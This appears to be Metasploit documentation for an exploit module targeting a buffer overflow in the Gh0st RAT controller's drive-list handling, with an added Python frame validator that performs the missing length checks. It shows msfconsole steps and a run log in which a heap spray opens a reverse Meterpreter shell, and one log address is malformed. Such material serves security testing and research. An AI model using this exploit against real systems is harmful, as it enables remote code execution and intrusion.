## Vulnerable Application
This module exploits a buffer overflow in the Gh0st Controller when it handles a drive list received from a victim.

This vulnerability can allow remote code execution in the context of the user who ran the controller.

A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

## Verification Steps

1. Run the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/gh0st`
4. Do: `set rhost [ip]`
5. Do: `exploit`
6. Get a shell

## Options

**MAGIC**

This is the 5-character magic used by the server. The default is `Gh0st`.

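As an added example (not code from the module or from the Gh0st source): a Python validator for Gh0st-framed messages that performs the length checks whose absence lets an oversized drive list overrun the controller's buffer, and that honours a configurable 5-byte magic like the module's `MAGIC` option. The 13-byte header layout (magic, little-endian u32 total length, little-endian u32 uncompressed length, zlib body) is assumed from public descriptions of the Gh0st protocol; the page itself only states the magic, and `MAX_BODY`, `build_frame` and `parse_frame` are names chosen here.

```python
import struct
import zlib

# Frame layout assumed from public descriptions of the Gh0st RAT protocol
# (the page only states the 5-character magic):
#   magic(5) | u32 LE total length | u32 LE uncompressed length | zlib body
MAGIC = b"Gh0st"          # same value as the module's MAGIC default
HEADER_LEN = 13
MAX_BODY = 64 * 1024      # hypothetical cap on a decompressed body; a drive
                          # list is a few dozen bytes, so anything larger is suspect


def build_frame(body: bytes, magic: bytes = MAGIC) -> bytes:
    """Constructed test input: wrap a body the way a Gh0st client would."""
    comp = zlib.compress(body)
    return magic + struct.pack("<II", HEADER_LEN + len(comp), len(body)) + comp


def parse_frame(data: bytes, magic: bytes = MAGIC):
    """Return (body, 'ok') for a well-formed frame, or (None, reason).

    Every declared length is checked against what was actually received
    before anything is copied; skipping these checks is what lets an
    oversized drive list overflow a fixed-size buffer in the controller.
    """
    if len(magic) != 5:
        raise ValueError("magic must be exactly 5 bytes")
    if len(data) < HEADER_LEN:
        return None, "short header"
    if data[:5] != magic:
        return None, "bad magic"
    total_len, orig_len = struct.unpack_from("<II", data, 5)
    if total_len != len(data):
        return None, f"declared total length {total_len} != received {len(data)}"
    if orig_len > MAX_BODY:
        return None, f"declared body length {orig_len} exceeds cap {MAX_BODY}"
    try:
        # Bounded inflate: never produce more than one byte past the declared
        # size, so a lying header cannot make us allocate arbitrarily.
        body = zlib.decompressobj().decompress(data[HEADER_LEN:], orig_len + 1)
    except zlib.error:
        return None, "body is not valid zlib data"
    if len(body) != orig_len:
        return None, f"decompressed {len(body)} bytes, header claimed {orig_len}"
    return body, "ok"
```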
## Scenarios

### Windows XP SP3 with gh0st 3.6

```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
[*] 1.2.3.1.108:80 - Spraying heap...
[*] 1.2.3.1:80 - Trying command 103...
[*] Sending stage (956991 bytes) to 1.2.3.1
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
[*] 1.2.3.1:80 - Server closed connection

meterpreter >
```